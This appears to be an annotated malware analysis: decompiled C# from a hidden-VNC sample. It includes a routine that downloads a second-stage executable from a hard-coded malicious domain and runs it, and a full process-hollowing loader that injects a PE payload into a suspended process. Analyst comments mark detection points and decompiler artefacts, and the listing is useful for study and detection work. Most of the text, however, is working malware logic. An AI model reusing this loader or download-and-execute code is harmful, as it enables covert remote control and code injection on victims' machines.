 // Token: 0x060000E6 RID: 230 RVA: 0x00010928 File Offset: 0x0000EB28
 // Analyst note (decompiled sample): HVNC start-up routine.
 // Creates a separate desktop named "RemoteDesktop", launches <SystemDrive>\Windows\explorer.exe
 // on it, downloads a second-stage executable from hxxp://fuehaoisdfhjaefouiads[.]info
 // (HVNC20.exe or HVNC40.exe, selected by the running CLR's major version) and hands the bytes
 // to RunPE.TryRun with the current executable as host process and "RemoteDesktop" as desktop.
 // Triage / detection points visible here: the hard-coded domain and file names, the desktop
 // name, explorer.exe started with a non-default lpDesktop, and a WebClient download followed
 // immediately by a RunPE call from the same process.
 // ipport: passed through unchanged to RunPE.TryRun; presumably the command line handed to the
 //         hollowed process (HandleRun's `cmd`) — confirm against the payload.
 // Note: `data` and `security_ATTRIBUTES2` are read before any assignment, so this listing is
 // decompiler output that does not compile as written; keep that in mind when comparing with the binary.
 public static void StartHVNC(string ipport)
 {
     if (!HVNC.Running)
     {
         // bInheritHandle written as -1 (VB-style TRUE); nLength is not assigned in this excerpt.
         HVNC.SA.bInheritHandle       = -1;
         HVNC.SA.lpSecurityDescriptor = (IntPtr)0L;
         // flags 1u = DF_ALLOWOTHERACCOUNTHOOK; accessMask 511u = 0x1FF, i.e. every DESKTOP_* access right.
         HVNC.hNewDesktop             = HVNC.CreateDesktop("RemoteDesktop", (IntPtr)0L, (IntPtr)0L, 1u, 511u, HVNC.SA);
         RunPE.PROCESS_INFORMATION process_INFORMATION = default(RunPE.PROCESS_INFORMATION);
         RunPE.STARTUP_INFORMATION startup_INFORMATION = default(RunPE.STARTUP_INFORMATION);
         startup_INFORMATION.cb        = Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION));
         // explorer.exe is bound to the new desktop via lpDesktop — an observable anomaly for a shell process.
         startup_INFORMATION.lpDesktop = "RemoteDesktop";
         // First three characters of the System folder path are the drive root (e.g. "C:\").
         string lpApplicationName = Environment.GetFolderPath(Environment.SpecialFolder.System).Substring(0, 3) + "Windows\\explorer.exe";
         string lpCommandLine     = null;
         // security_ATTRIBUTES2 is never assigned (decompiler artefact); the original presumably passed zeroed structs.
         HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES2;
         HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES  = security_ATTRIBUTES2;
         HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES3 = security_ATTRIBUTES2;
         // dwCreationFlags 0u: explorer.exe is started normally (not suspended) on the hidden desktop.
         RunPE.CreateProcess(lpApplicationName, lpCommandLine, ref security_ATTRIBUTES, ref security_ATTRIBUTES3, false, 0u, IntPtr.Zero, null, ref startup_INFORMATION, out process_INFORMATION);
         WebClient webClient = new WebClient();
         byte[]    data;
         // Payload chosen by CLR version (Environment.Version.Major); no branch for other versions,
         // so `data` stays unassigned there — another sign this is raw decompiler output.
         if (Environment.Version.Major == 2)
         {
             data = webClient.DownloadData("http://fuehaoisdfhjaefouiads.info/HVNC20.exe");
         }
         if (Environment.Version.Major == 4)
         {
             data = webClient.DownloadData("http://fuehaoisdfhjaefouiads.info/HVNC40.exe");
         }
         // Current executable is the host image; HVNC.PID receives the child's process id.
         RunPE.TryRun(Process.GetCurrentProcess().MainModule.FileName, ipport, data, true, true, "RemoteDesktop", ref HVNC.PID);
         // Guard so the routine runs at most once per process.
         HVNC.Running = true;
     }
 }
 // P/Invoke to the Win32 CreateProcess API (the DllImport attribute is not part of this excerpt).
 // Callers on this page pass both SECURITY_ATTRIBUTES refs from an unassigned local — a decompiler artefact.
 public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref HVNC.SECURITY_ATTRIBUTES lpProcessAttributes, ref HVNC.SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref RunPE.STARTUP_INFORMATION lpStartupInfo, out RunPE.PROCESS_INFORMATION lpProcessInformation);
    // Token: 0x060000A5 RID: 165 RVA: 0x0000BDD0 File Offset: 0x00009FD0
    // Analyst note (decompiled sample): process-hollowing loader (MITRE ATT&CK T1055.012).
    // Starts `path` suspended (dwCreationFlags 4u = CREATE_SUSPENDED), optionally on `Desktop` and with a
    // hidden window, replaces the suspended process's image with the PE held in `data`, points the primary
    // thread at the payload's entry point and resumes it. The hard-coded header offsets (60, +52, +80, +84,
    // +40, +248) match a PE32 image, so the payload must be 32-bit. On any failure the child is killed and
    // false is returned; exception details are discarded.
    // Detection points visible here: a CREATE_SUSPENDED child whose command line is just the quoted path,
    // NtUnmapViewOfSection / VirtualAllocEx with PAGE_EXECUTE_READWRITE / WriteProcessMemory targeting the
    // child, (Wow64)GetThreadContext + (Wow64)SetThreadContext on its primary thread, then ResumeThread.
    // Parameters: path = host executable; cmd = text appended after the quoted path when non-empty;
    // data = payload PE bytes; compatible = when false, fall back to any address if the preferred image base
    // is unavailable; hidden = apply STARTF_USESHOWWINDOW/SW_HIDE; Desktop = lpDesktop when non-empty;
    // PID = receives the child's process id on success. Returns true once the child has been resumed.
    // `ref int PID = 0` and the unassigned `flag` / `security_ATTRIBUTES2` locals are decompiler artefacts;
    // the listing does not compile as written.
    private static bool HandleRun(string path, string cmd, byte[] data, bool compatible, bool hidden = false, string Desktop = "", ref int PID = 0)
    {
        string text = string.Format("\"{0}\"", path);

        RunPE.STARTUP_INFORMATION startup_INFORMATION = default(RunPE.STARTUP_INFORMATION);
        RunPE.PROCESS_INFORMATION process_INFORMATION = default(RunPE.PROCESS_INFORMATION);
        startup_INFORMATION.cb = Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION));
        if (Desktop.Length > 0)
        {
            startup_INFORMATION.lpDesktop = Desktop;
        }
        if (hidden)
        {
            // wShowWindow 0 = SW_HIDE, dwFlags 1 = STARTF_USESHOWWINDOW.
            startup_INFORMATION.wShowWindow = 0;
            startup_INFORMATION.dwFlags     = 1;
        }
        try
        {
            if (!string.IsNullOrEmpty(cmd))
            {
                text = text + " " + cmd;
            }
            string lpCommandLine = text;
            // security_ATTRIBUTES2 is never assigned (decompiler artefact).
            HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES2;
            HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES  = security_ATTRIBUTES2;
            HVNC.SECURITY_ATTRIBUTES security_ATTRIBUTES3 = security_ATTRIBUTES2;
            // 4u = CREATE_SUSPENDED: the host never runs its own code before being overwritten.
            if (!RunPE.CreateProcess(path, lpCommandLine, ref security_ATTRIBUTES, ref security_ATTRIBUTES3, false, 4u, IntPtr.Zero, null, ref startup_INFORMATION, out process_INFORMATION))
            {
                throw new Exception();
            }
            // data[60] is e_lfanew (offset of the NT headers); num2 is the payload's preferred ImageBase.
            int   num   = BitConverter.ToInt32(data, 60);
            int   num2  = BitConverter.ToInt32(data, num + 52);
            // x86 CONTEXT-sized buffer; 65538 = 0x10002 = CONTEXT_INTEGER. Wow64 variants are used on a 64-bit host.
            int[] array = new int[179];
            array[0] = 65538;
            if (IntPtr.Size == 4)
            {
                if (!RunPE.GetThreadContext(process_INFORMATION.ThreadHandle, array))
                {
                    throw new Exception();
                }
            }
            else if (!RunPE.Wow64GetThreadContext(process_INFORMATION.ThreadHandle, array))
            {
                throw new Exception();
            }
            int num3 = array[41];
            int num4;
            int num5;
            // Reads the child's current image base (4 bytes at the saved-context pointer + 8) and
            // unmaps the original image only when it collides with the payload's preferred base.
            if (!RunPE.ReadProcessMemory(process_INFORMATION.ProcessHandle, num3 + 8, ref num4, 4, ref num5))
            {
                throw new Exception();
            }
            if (num2 == num4 && RunPE.NtUnmapViewOfSection(process_INFORMATION.ProcessHandle, num4) != 0)
            {
                throw new Exception();
            }
            // +80 = SizeOfImage, +84 = SizeOfHeaders.
            int  length     = BitConverter.ToInt32(data, num + 80);
            int  bufferSize = BitConverter.ToInt32(data, num + 84);
            // 12288 = MEM_COMMIT|MEM_RESERVE, 64 = PAGE_EXECUTE_READWRITE: an RWX region in a remote
            // process is a strong telemetry signal for this technique.
            int  num6       = RunPE.VirtualAllocEx(process_INFORMATION.ProcessHandle, num2, length, 12288, 64);
            bool flag;
            // `flag` is only assigned on this path (decompiler artefact).
            if (!compatible && num6 == 0)
            {
                flag = true;
                num6 = RunPE.VirtualAllocEx(process_INFORMATION.ProcessHandle, 0, length, 12288, 64);
            }
            if (num6 == 0)
            {
                throw new Exception();
            }
            // Headers first, then each section's raw data at its virtual address (+248 = first
            // section header, +6 = NumberOfSections, 40-byte section entries).
            if (!RunPE.WriteProcessMemory(process_INFORMATION.ProcessHandle, num6, data, bufferSize, ref num5))
            {
                throw new Exception();
            }
            int   num7  = num + 248;
            short num8  = BitConverter.ToInt16(data, num + 6);
            int   num9  = 0;
            int   num10 = (int)(num8 - 1);
            for (int i = num9; i <= num10; i++)
            {
                int num11     = BitConverter.ToInt32(data, num7 + 12);
                int num12     = BitConverter.ToInt32(data, num7 + 16);
                int srcOffset = BitConverter.ToInt32(data, num7 + 20);
                if (num12 != 0)
                {
                    byte[] array2 = new byte[num12 - 1 + 1];
                    Buffer.BlockCopy(data, srcOffset, array2, 0, array2.Length);
                    if (!RunPE.WriteProcessMemory(process_INFORMATION.ProcessHandle, num6 + num11, array2, array2.Length, ref num5))
                    {
                        throw new Exception();
                    }
                }
                num7 += 40;
            }
            // Writes the new base back to the location the old base was read from.
            byte[] bytes = BitConverter.GetBytes(num6);
            if (!RunPE.WriteProcessMemory(process_INFORMATION.ProcessHandle, num3 + 8, bytes, 4, ref num5))
            {
                throw new Exception();
            }
            // +40 = AddressOfEntryPoint; the saved context is updated and written back so the
            // resumed thread starts in the payload instead of the host image.
            int num13 = BitConverter.ToInt32(data, num + 40);
            if (flag)
            {
                num6 = num2;
            }
            array[44] = num6 + num13;
            if (IntPtr.Size == 4)
            {
                if (!RunPE.SetThreadContext(process_INFORMATION.ThreadHandle, array))
                {
                    throw new Exception();
                }
            }
            else if (!RunPE.Wow64SetThreadContext(process_INFORMATION.ThreadHandle, array))
            {
                throw new Exception();
            }
            // ResumeThread reports failure as -1 (0xFFFFFFFF).
            if (RunPE.ResumeThread(process_INFORMATION.ThreadHandle) == -1)
            {
                throw new Exception();
            }
            PID = (int)process_INFORMATION.ProcessId;
        }
        catch (Exception ex)
        {
            // Best-effort cleanup: the suspended child is killed, which leaves a short-lived
            // suspended process in telemetry. `ex` is unused. Note that Process.GetProcessById
            // throws ArgumentException when no process has that id (e.g. ProcessId 0 after a failed
            // CreateProcess), so that case presumably escapes as an exception instead of returning false.
            Process processById = Process.GetProcessById((int)process_INFORMATION.ProcessId);
            if (processById != null)
            {
                processById.Kill();
            }
            return(false);
        }
        return(true);
    }
 // P/Invoke to the Win32 CreateDesktop API (the DllImport attribute is not part of this excerpt).
 // StartHVNC on this page calls it with desktopName "RemoteDesktop", flags 1u and accessMask 511u
 // (0x1FF, every DESKTOP_* access right); a non-standard desktop name is itself a triage indicator.
 public static extern IntPtr CreateDesktop(string desktopName, IntPtr device, IntPtr deviceMode, uint flags, uint accessMask, HVNC.SECURITY_ATTRIBUTES attributes);